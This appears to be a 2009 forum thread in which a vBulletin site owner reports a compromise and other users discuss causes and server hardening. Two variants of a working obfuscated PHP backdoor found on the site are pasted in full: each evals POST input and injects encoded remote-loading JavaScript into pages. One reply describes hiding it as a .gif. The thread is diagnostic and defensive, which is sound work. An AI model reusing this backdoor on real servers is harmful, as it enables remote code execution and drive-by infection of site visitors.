Okay guys, I was out to dinner before and came back and loaded my site, http://www.theangryforum.com to see a PHP error syntax on line 1...

I open up my index file and find this:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0N zN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3V Vc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0x EcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loT CUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHx HU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpK TsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'', $s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)| |stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php



This was dumped on a crap load of my files. The file structure was not 777 for these files either, and I do not know how this was injected in. My database was not touched, but I had to delete the installation of VB and install a fresh install and connect to the database.

I did some research on this, and results are slim but its attacking programs as well. Oscommerce for example:

http://forums.oscommerce.com/lofiversion/index.php?t321418.html

Anyone see this before?

I was more in panic to get my site up, now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to VB or what ever can be done.

Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

I am contacting my host right now, I am on a VPS and I have been checking the server logs for anything weird, but I think my admin is better to find something if there is something..

I would of thought, though, if they got into the server through a backdoor or something, they would of effected my other accounts. I have VB running on another account for another site, and a few other accounts with various programs that were not touch (and have been on there for a very long time)

Here is the list of my mods,

I have ibProArcade v.2.6.8 which this file structure was changed I noticed.

Here is a list of my other mods:

Admin Log In As User

Cyb - Advanced Permissions Based on Post Account

Fake User (adds a couple guests)

GTSmilieBox

Panic Button

Plus Mood

vB Ad Management

vBadvanced CMPS

vbSEO Site Map

Welcome Headers

--------------- Added 1238915113 at 1238915113 ---------------

Maybe someone can chime in?

This guy is getting FTP access, I have formatted all my pcs to make sure I don't have a virus, and my host is looking through everything as well.

Thing that throw my interest:


Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c


Why the arcade first? Compromised maybe? I deleted the folder when I did a backup, I also disabled my FTP server...

It is related to your server administration, you did not do anything wrong neither your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server’s temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

It is related to your server administration, you did not do anything wrong neither your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server?s temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

Yea, I agree with you - because I have been going crazy formatting my machines to make sure I had no key loggers on it, etc.

The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole, if not I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well.

Considering it is a VPS, I have multiple accounts on there including another site for VB.. why is this guy going on after this site?

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
<?php if(!function_exists('tmp_lkojfghx')){define('PMT_k nghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0 +CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpK WV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY 5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJ CU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzI lMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJ CU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTY zISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18P SQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzc kJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjd CElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyM lMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzR mAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjE lNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlM jgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB 0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsY WNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWF ob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc 2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==' 1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbG FuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVy IHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\ 1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||s tristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, that look like broken images when viewed (php script executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
<?php if(!function_exists('tmp_lkojfghx')){define('PMT_k nghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0 +CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpK WV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY 5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJ CU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzI lMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJ CU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTY zISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18P SQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzc kJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjd CElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyM lMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzR mAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjE lNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlM jgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB 0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsY WNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWF ob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc 2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==' 1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbG FuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVy IHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\ 1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||s tristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, that look like broken images when viewed (php script executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.

Yea,

I agree - I took your advice and moved - I can't let this sit over my head :erm:

If your on a VPS chances are good, security and management relys on you or your server admin.

Your server security is only as secure as your least secure admin/server manager.

Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.

All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server where he controls the HTML and javascripts.

In his HTML there, all he needs is an img tag with src= any url at your vb3 site and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request.

img isn't the only tag, either, script tags work, too, as do css (link) tags, and a few others.

That's why vBulletin introduced CSRF protection. ;)

That's why vBulletin introduced CSRF protection. ;)

Indeed. It's a good reason to always keep your vb3 up to date, version-wise (to get these kinds of fixes). Though installed hacks and mods that don't have CSRF built in are giant security holes.

Two mods I'd love to see, but haven't found here are:

1) Allow trusted users (e.g. by user group) to post HTML in forums. Right now, you can turn on HTML in one or more forums, but globally for all users.
2) Fix the HTML posting so it strips out script tags and other potentially malicious things (img with src=something.php?args - get rid of ?args)

img with src=something.php?args - get rid of ?args
vBulletin already allows for this, inside vBulletin Options.

I guess the same would go with this code then? Looks like an
<html><body><script>alert('SwZNd');</script></body></html>


I found that in a PNG file on one of my clients accounts, along with a .zip file and a full directory of helpdesk software, along with a new database for that program.

Anything that looks like that generally isn't good. ;)

Anything that looks like that generally isn't good. ;)

Yuppp... I found that in a PNG file on two of my clients sites. Their sites have been running well over a year now for no problem, but as soon as I changed hosts it hit the fan. One of the programs installed a helpdesk on their account, even had access to mysql.

What does that code do, pretty much the same as above? Access a file in tmp to great un rooted access?

Dumped that host likes its hot.

The code above doesn't do anything. It's just "test" script.

The code above doesn't do anything. It's just "test" script.

Well somehow that image and that helpdesk was installed on the same day.. That site was open for at least a year - 2 weeks after I moved to a new host is when my vb forum got hacked and my clients site were hacked..

No security at all apparently..

How do you secure the tmp dir ? chown it?

How do you secure the tmp dir ? chown it?

Simple answer - use a different temp dir than the default /tmp one, chown / chmod that one and make sure anything active (PHP, SSI) isn't active there.
Related to the VPS issue and the "It's up to you" statement - that's only partially right. VPS run inside a virtual environment and if the hoster doesn't care about security updates it's possible - hard but possible - to break out from a VPS on the real server and from there, well, you can do everything.
Back to the "tmp dir" - set in php.ini a tempdir, outside the webroot of course and ensure your Webserver doesn't serve that directory.
And related to this base64 - I highly recommend reading some manuals about a "secure as possible" PHP setup. Just because it's set in the default php.ini, it doesn't mean it's good to be kept ;)

Simple answer - use a different temp dir than the default /tmp one, chown / chmod that one and make sure anything active (PHP, SSI) isn't active there.
Related to the VPS issue and the "It's up to you" statement - that's only partially right. VPS run inside a virtual environment and if the hoster doesn't care about security updates it's possible - hard but possible - to break out from a VPS on the real server and from there, well, you can do everything.
Back to the "tmp dir" - set in php.ini a tempdir, outside the webroot of course and ensure your Webserver doesn't serve that directory.
And related to this base64 - I highly recommend reading some manuals about a "secure as possible" PHP setup. Just because it's set in the default php.ini, it doesn't mean it's good to be kept ;)

Chown it as a different user other than root?

Chown it as a different user other than root?
Ideally, a user just dedicated to PHP (with locked down permissions). Also have a look at upload_tmp_dir (you may want to change this as well, although it is not necessary).

Sorry for reviving this old thread but how can I know if my site is compromised?

Sorry for reviving this old thread but how can I know if my site is compromised?

usually if you keep your bulletin board up to date, your pretty safe

You don't really know until its too late. However, as mentioned above, keeping your software as up to day as possible will reduce this risk.

What about the tmp folder?

What about it? As long as you keep PHP's temp directory secured, you should be fine.

What I meant was how do I know if the /tmp/ folder is not secured?

How do you secure the tmp dir ? chown it?

The hacker does not use a /tmp dir, to hack your forum. He takes advantage of your 0777 chmoded dirs in vB to screw you nice.
I posted this issue long time ago but people thought I'm crazy. I even wrote a tutorial on this site how to secure vB... Put it this way: You have a 0777 dir into your /var/www/html (or whatever is the web root)? You can be hacked, very easy.

Read this article (https://vborg.vbsupport.ru/showthread.php?t=148209) I wrote long time ago... probably nobody read it.
Then secure the same way the curent 0777 dirs, not just the config file. Chmod them to 0750 and own them by nologinuser:root.

The hacker does not use a /tmp dir, to hack your forum. He takes advantage of your 0777 chmoded dirs in vB to screw you nice.
I posted this issue long time ago but people thought I'm crazy. I even wrote a tutorial on this site how to secure vB... Put it this way: You have a 0777 dir into your /var/www/html (or whatever is the web root)? You can be hacked, very easy.

Read this article (https://vborg.vbsupport.ru/showthread.php?t=148209) I wrote long time ago... probably nobody read it.
Then secure the same way the curent 0777 dirs, not just the config file. Chmod them to 0750 and own them by nologinuser:root.

Thank you!

Teck-

Just to make sure I understand, moving the config.php to another directory out of the public html will not affect vb operation?

I was just hacked yesterday and confirmed that it was some sort of database insertion, based on that when I restored a backup database, the hack was cleared. I wasn't able to find any files with changed dates.

Is there some other way, other that the hacker breaking the config.php that they could manipulate the database?

Note that I also have htaccess on all pertinent directories.

Thanks!

Is there some other way, other that the hacker breaking the config.php that they could manipulate the database?
Yes, you could have a modification installed that is open to SQL injection attack. This is the most likely method.

Just to make sure I understand, moving the config.php to another directory out of the public html will not affect vb operation?

This won't increase security at all for the simple fact your VB still needs to be able to read that file. So you may move it around on the filesystem, still find a way on how VB can read this file, either by symlinking or something else.
If that is done, every "hacker" will be able to read that file as well.

Better spend your time keeping your VB & Plugins up-to-date and use things like mod_security / suhosin and the typical setups like chroot / jail. That's more time consuming but no "security by obscurity" when moving some files just to have a work-around that VB can read them.

And make sure your VB files aren't writeable by PHP itself, if you store uploads in the filesystem, move that directory outside the webroot and additionally some directories like images / signaturepics - don't need PHP because there just images are stored.

Something simple like:


<Directory /where_ever_your_vb_is_stored/(clientscript|cpstyles|customavatars...)>
php_flag_engine Off
</Directory>

<Files "/where_ever_your_vb_is_stored/includes/config.php">
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Files>


Then moving the "uploads" directory outside the webroot that it can't be accessed directly.
Finally - mod_security & suhosin should be used. First starting them both in logging mode to collect a whitelist, highly depends on how your forum is used, and once that whitelist is completed to sort out false-positives set both in blocking mode.

And - as last addition - you can setup an IDS system that creates checksum of your VB files and alerts you if there're any changes.

Yes - I can do this ;) It won't even cost much ;)

I hate to hjack this thread but Angel-Wings has got my attention.

I found that the person that attacked with SQL injection came from overseas, I am in the US. Since ALL of my traffic is actually on the west coast, I used htaccess to block all but US traffic. Appears to be working so far according to my logs.

On the SQL injection note, I restored my backup database so the hacked database is gone. I have contacted the programmed of the only two mods I have installed and he indicated they work on the admincp level so injection isn't possible. Since I'm a newbie in this area, I can't confirm. Is there any way to track database activity so I can find out how they got in?

It appears the last two actions (many other http/file.php attempts before that) were the hacker going to sendmessage.php and then 45 minutes later, them going to the index probably to check that their hack worked. I have since disabled the sendmessage.php in the contact vb options.

Thanks for any input.

If you would of done as i posted in your own thread, you wouldn't of needed to restore a backup.

1. You should of upgraded vb, hacks/addons, server backend and anything else outdated.
2. Sym linking your config.php isnt going top stop the hacker either.
3. Blocking foreign based ips isnt going to stop him either.

Seeing as you still present the injection hole for him to use, he will be back to visit you again.

I found that the person that attacked with SQL injection came from overseas, I am in the US. Since ALL of my traffic is actually on the west coast, I used htaccess to block all but US traffic. Appears to be working so far according to my logs.

And the logs just say the attacker isn't coming from US West coast ? Well, in a world of bot nets and open proxies it's maybe just a matter of time until the attacker found an IP that isn't blocked.
Maybe better spend your time fixing the holes - if I don't look the door and just paste a huge poster over it the door itself isn't more "secure" and this "door" is the problem, not how to hide it from someone.

On the SQL injection note, I restored my backup database so the hacked database is gone. I have contacted the programmed of the only two mods I have installed and he indicated they work on the admincp level so injection isn't possible. Since I'm a newbie in this area, I can't confirm. Is there any way to track database activity so I can find out how they got in?

You can enable the Query log in your Database but this might be a performance issue. Also protecting the Admin & Mod Panel with an Auth won't hurt - just ensure the login user and password aren't written somewhere at your board.

It appears the last two actions (many other http/file.php attempts before that) were the hacker going to sendmessage.php and then 45 minutes later, them going to the index probably to check that their hack worked. I have since disabled the sendmessage.php in the contact vb options.

Can also be the usual "background noise" like automatic IP scans for holes in the all-time-favorites like Joomla, phpMyAdmin, Horde and some older VB holes. Dunno how the attacking people(s) read their attack logs, maybe they just filtered for 200 replies and so wanted to see if they did any damage.
Right now, try to find out how it happened and fix the hole. Then things like IP Range blocking can be done anyways - first get the system clean and up-to-date - then additional enhancements can be done. :)

If you would of done as i posted in your own thread, you wouldn't of needed to restore a backup.

1. You should of upgraded vb, hacks/addons, server backend and anything else outdated.
2. Sym linking your config.php isnt going top stop the hacker either.
3. Blocking foreign based ips isnt going to stop him either.

Seeing as you still present the injection hole for him to use, he will be back to visit you again.

I spoke with the programmer of the two mods. He indicated these mods are not accessible from anywhere but the admincp. I am not a programmer so I can't confirm. The guy has a good reputation but who can you really trust.

I am at 3.8.3 [EDIT: Actually 3.8.2]. I am not sure that 3.8.4 has any security fixes in it. I'll double check. I believe my host has the server up to date. Again, I'll double check.

I can't see how just updating as you suggested would have removed the hack they injected without me restoring the backup (note that this was a database restore only, not entire system). No matter what I did, it showed a disturbing picture and hackers text. It seems that would be in the database no matter what updates were performed.

And the logs just say the attacker isn't coming from US West coast ? Well, in a world of bot nets and open proxies it's maybe just a matter of time until the attacker found an IP that isn't blocked.
Maybe better spend your time fixing the holes - if I don't look the door and just paste a huge poster over it the door itself isn't more "secure" and this "door" is the problem, not how to hide it from someone.

I figured this wasn't a fix but a band-aid until I got the hole fixed. I also have some code in the htaccess to deny proxy and other items. Found it online and learning as I go, hope it works.

RewriteEngine on
RewriteCond %{HTTP:VIA} !^$ [OR]
RewriteCond %{HTTP:FORWARDED} !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
RewriteRule ^(.*)$ - [F]


You can enable the Query log in your Database but this might be a performance issue. Also protecting the Admin & Mod Panel with an Auth won't hurt - just ensure the login user and password aren't written somewhere at your board.

I have htaccess for admin and mod cp for that requires authentication.

Can also be the usual "background noise" like automatic IP scans for holes in the all-time-favorites like Joomla, phpMyAdmin, Horde and some older VB holes. Dunno how the attacking people(s) read their attack logs, maybe they just filtered for 200 replies and so wanted to see if they did any damage.
Right now, try to find out how it happened and fix the hole. Then things like IP Range blocking can be done anyways - first get the system clean and up-to-date - then additional enhancements can be done. :)

I guess I am taking the right steps, just out of order. I'm still at a loss for figuring out how they 'injected' in the first place. Please forgive my ignorance. From what I've read, VBulletin is pretty secure against injection as long as there aren't any mods. Is this a fact? I am using the VB default style so it shouldn't be an issue there. How would I be able to tell if the two mods I have are not secure?

Thanks again for input.

We had about a dozen of cases in the past week from our clients of websites with vBulletin that were hacked. Anyhow, it turned out all of them had been hacked through a Wordpress installed on the server. Some of our clients had old WP installation they had forgotten about, others did not upgrade as they were recommend to, and script kids entered through WP, took the passwd file, and decrypted passwords, gaining FTP access.

There are many ways to prevent this; keep your system always updated; keep your applications always updated; and then do everything you can to secure your system. The best way to prevent attacks that write files to a directory to execute them is to have a system like SELinux in place, or GRSecurity. There are wonderful linux distributions that, for a few bucks per year, provide a secured kernel with many layers of protection applied - from modsecurity to granular permissions, and everything in between.

The reason i stated you didnt need to restore from a back up is that you could of just removed the code they injected, which was likely a base64 code into a template, most likely spacer_open.

As stated, you haven't plugged the hole and your not going to stop him from revisiting your forum doing a IP block or symlinking your config file.

Unless you know for sure that everything on your site/server is secure, your at risk

@Carlito, excellent point on the WP, thats why i told him everything needs to be upgraded.

The reason i stated you didnt need to restore from a back up is that you could of just removed the code they injected, which was likely a base64 code into a template, most likely spacer_open.

As stated, you haven't plugged the hole and your not going to stop him from revisiting your forum doing a IP block or symlinking your config file.

Unless you know for sure that everything on your site/server is secure, your at risk

@Carlito, excellent point on the WP, thats why i told him everything needs to be upgraded.

I see. I'm learning as I go here.

I just upgraded to 3.8.4. I'm not familiar with the coding of databases. Is it something I can check now to see if there is a hole and the 'base64 code into a template, most likely spacer_open' can be used again? How does one check for these vulnerabilities?

No Wordpress on my side but I did talk to my host and this being a shared server, I guess there is always a possiblity of someone hacking another database or application on the other virtuals and affecting my system?

No Wordpress on my side but I did talk to my host and this being a shared server, I guess there is always a possiblity of someone hacking another database or application on the other virtuals and affecting my system?

Well - if that's the case then it's the hoster's fault by not separating client websites enough - it's possible for one "hacked" website to access all other sites.
Really depends on how their machines are configured so blaming them might be too early - still yes, it's possible.
Hope you still have the logs saved - maybe they'll like to see them for analysis.

Oh - and you htaccess just blocks proxies that shout out to the world they are proxies. No "real" hacker would use such anyways.
Like said - really recommend mod_sec to block things you don't want - beginning with direct IP access and ending with filtering bad useragents or injection attacks.